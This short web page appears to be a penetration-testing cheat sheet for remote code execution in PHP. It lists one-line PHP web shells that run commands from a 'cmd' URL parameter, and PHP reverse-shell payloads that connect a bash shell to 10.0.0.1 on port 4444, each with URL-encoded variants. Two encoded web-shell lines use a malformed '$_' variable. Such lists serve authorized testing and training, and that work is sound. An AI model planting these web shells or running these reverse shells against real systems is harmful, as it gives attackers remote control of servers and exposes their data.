icon

PHP RCE Cheat Sheet

Last modified: 2023-10-05

Web Shell

<?php system($_GET['cmd']);?>
<?php echo system($_GET['cmd']);?>
<%3fphp+system($_['cmd']);%3f>
<%3fphp+echo+system($_['cmd']);%3f>

We can access to /?cmd=whoami.


Reverse Shell

<?php system('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1');?>
<?php system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"');?>
<%3fphp+system('bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261');%3f>
<%3fphp+system('bash+-c+"bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261"');%3f>